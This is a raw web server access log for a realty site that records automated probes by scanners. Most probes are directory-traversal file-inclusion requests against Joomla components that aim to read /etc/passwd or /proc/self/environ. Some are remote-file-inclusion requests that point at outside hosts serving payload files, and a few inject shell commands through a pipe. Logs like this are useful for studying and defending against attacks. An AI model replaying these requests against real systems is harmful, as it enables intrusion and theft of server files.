213.180.89.75 - - [29/Jul/2010:07:08:29 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:07:08:29 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:07:08:29 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:07:08:41 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:08:57 -0700] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:09:00 -0700] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:07:09:10 -0700] "GET /logs/access.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:07:09:22 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:07:09:11 -0700] "GET /logs////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:09:36 -0700] "GET /logs/access.log//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:09:37 -0700] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:09:26 -0700] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:09:41 -0700] "GET /logs/access.log//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:09:42 -0700] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:09:43 -0700] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:07:09:43 -0700] "GET /logs/access.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:07:09:43 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:07:09:43 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:19:43 -0700] "GET /logs/access_100624.log//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:19:44 -0700] "GET /logs/access_100624.log//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:07:20:23 -0700] "GET /logs/access.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:07:20:23 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:07:20:35 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
83.165.195.143 - - [29/Jul/2010:07:20:51 -0700] "GET /logs/access.log HTTP/1.0" 200 105116 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12" "www.prosouthrealty.com"
209.61.244.6 - - [29/Jul/2010:07:22:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.prosouthrealty.com"
174.120.181.101 - - [29/Jul/2010:07:23:00 -0700] "GET /logs/access.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.prosouthrealty.com"
174.120.181.101 - - [29/Jul/2010:07:23:11 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.prosouthrealty.com"
174.120.181.101 - - [29/Jul/2010:07:23:00 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:07:24:00 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:07:24:08 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
217.73.227.25 - - [29/Jul/2010:07:26:20 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
217.73.227.25 - - [29/Jul/2010:07:26:31 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
217.73.227.25 - - [29/Jul/2010:07:26:20 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
209.61.244.6 - - [29/Jul/2010:07:32:08 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:07:32:16 -0700] "GET /logs/access_100626.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:07:32:27 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:07:32:17 -0700] "GET /logs/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1510 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:07:33:29 -0700] "GET /logs/access.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:07:33:40 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:07:33:40 -0700] "GET /logs/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1510 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
209.61.244.6 - - [29/Jul/2010:07:36:16 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.prosouthrealty.com"
209.61.244.6 - - [29/Jul/2010:07:36:17 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.prosouthrealty.com"
209.61.244.6 - - [29/Jul/2010:07:36:28 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:40:10 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:40:47 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:41:30 -0700] "GET /logs/access.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:41:31 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:41:43 -0700] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
217.73.226.31 - - [29/Jul/2010:07:41:41 -0700] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:07:42:15 -0700] "GET /logs/access_100626.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
217.73.226.31 - - [29/Jul/2010:07:43:34 -0700] "GET /logs/access.log//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.prosouthrealty.com"
217.73.226.31 - - [29/Jul/2010:07:43:45 -0700] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.prosouthrealty.com"
217.73.226.31 - - [29/Jul/2010:07:43:35 -0700] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.prosouthrealty.com"
209.61.244.6 - - [29/Jul/2010:07:44:07 -0700] "GET /logs/access_100624.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:07:49:19 -0700] "GET /logs/access.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:07:49:20 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:07:49:31 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:51:42 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:51:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
209.61.244.6 - - [29/Jul/2010:07:52:36 -0700] "GET /logs/access.log//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.prosouthrealty.com"
209.61.244.6 - - [29/Jul/2010:07:52:36 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.prosouthrealty.com"
209.61.244.6 - - [29/Jul/2010:07:52:37 -0700] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:03:54 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:04:12 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
67.218.116.166 - - [29/Jul/2010:08:05:23 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:06:51 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:09:16 -0700] "GET /logs/access.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:09:28 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:09:17 -0700] "GET /logs/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 200 1494 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:11:41 -0700] "GET /logs/access.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:11:41 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:11:42 -0700] "GET /logs/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1510 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:11:44 -0700] "GET /logs/access_100626.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:11:44 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 200 900 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:11:55 -0700] "GET /logs/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1510 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:13:00 -0700] "GET /logs/access_100626.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:13:42 -0700] "GET /logs/access_100624.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:08:14:24 -0700] "GET /logs/access_100624.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
74.50.85.50 - - [29/Jul/2010:08:17:00 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:08:19:51 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
187.45.193.154 - - [29/Jul/2010:08:23:44 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:08:24:52 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:08:24:52 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:08:24:53 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:08:25:35 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:08:25:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:08:25:37 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:08:32:51 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:08:32:41 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:08:32:41 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:08:33:37 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:08:33:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:08:33:39 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
67.195.114.243 - - [29/Jul/2010:08:35:37 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.prosouthrealty.com"
67.195.114.243 - - [29/Jul/2010:08:35:38 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.prosouthrealty.com"
91.121.8.171 - - [29/Jul/2010:08:44:42 -0700] "GET /index1.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
209.61.244.6 - - [29/Jul/2010:08:45:09 -0700] "GET /%22?option=com_ckforms&controller=%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:08:46:36 -0700] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:08:48:14 -0700] "GET /logs/access.log//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:08:48:14 -0700] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:08:48:03 -0700] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
78.110.50.110 - - [29/Jul/2010:08:48:39 -0700] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
78.110.50.110 - - [29/Jul/2010:08:48:39 -0700] "GET /logs/access_100503.log////index.php?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
78.110.50.110 - - [29/Jul/2010:08:48:50 -0700] "GET /logs////index.php?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
202.70.136.22 - - [29/Jul/2010:08:49:44 -0700] "GET /logs/access.log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
202.70.136.22 - - [29/Jul/2010:08:49:44 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
202.70.136.22 - - [29/Jul/2010:08:49:56 -0700] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
91.121.8.171 - - [29/Jul/2010:08:51:39 -0700] "GET /logs/access.log/index1.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.8.171 - - [29/Jul/2010:08:51:50 -0700] "GET /index1.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.8.171 - - [29/Jul/2010:08:51:50 -0700] "GET /logs/index1.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:08:54:10 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:08:54:00 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:08:54:00 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
74.50.85.50 - - [29/Jul/2010:08:57:59 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
74.50.85.50 - - [29/Jul/2010:08:57:59 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
74.50.85.50 - - [29/Jul/2010:08:57:59 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
202.117.35.252 - - [29/Jul/2010:09:00:23 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://autonegocios.net/e107_images/casper/Ckrid1.txt??? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
202.117.35.252 - - [29/Jul/2010:09:00:23 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://autonegocios.net/e107_images/casper/Ckrid1.txt??? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
202.117.35.252 - - [29/Jul/2010:09:00:12 -0700] "GET /skin/zero_vote/error.php?dir=http://autonegocios.net/e107_images/casper/Ckrid1.txt??? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
202.117.35.252 - - [29/Jul/2010:09:00:23 -0700] "GET /logs//skin/zero_vote/error.php?dir=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
202.117.35.252 - - [29/Jul/2010:09:00:23 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
202.117.35.252 - - [29/Jul/2010:09:00:12 -0700] "GET /skin/zero_vote/error.php?dir=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
